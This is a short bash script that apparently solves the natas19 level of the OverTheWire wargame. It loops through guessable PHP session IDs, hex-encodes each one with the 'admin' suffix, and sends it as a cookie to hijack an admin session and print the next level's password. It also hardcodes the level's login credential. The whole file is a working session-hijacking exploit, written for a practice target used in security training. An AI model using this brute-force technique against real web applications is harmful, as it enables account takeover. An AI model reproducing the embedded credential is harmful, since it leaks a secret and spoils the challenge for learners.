#!/usr/bin/env bash

USERNAME="admin"
PASSWORD="arbitrary"

req() {
  local SESSION_ID=$1
  curl http://natas19.natas.labs.overthewire.org/index.php \
       -X POST                                             \
       -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr         \
       -d "username=$USERNAME"                             \
       -d "password=$PASSWORD"                             \
       --cookie "PHPSESSID=$SESSION_ID"                    \
       -sS                                                 \
    | grep "Password: "
}

MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
  # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
  SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
  printf "Attempt: %2d" $i
  OUT=$(req "$SESSION_ID")
  if [ $? -ne 0 ]; then
    echo -en '\r'
  else
    echo " [admin]"
    echo $OUT | awk '{print substr($2,1,32)}'
    break
  fi
done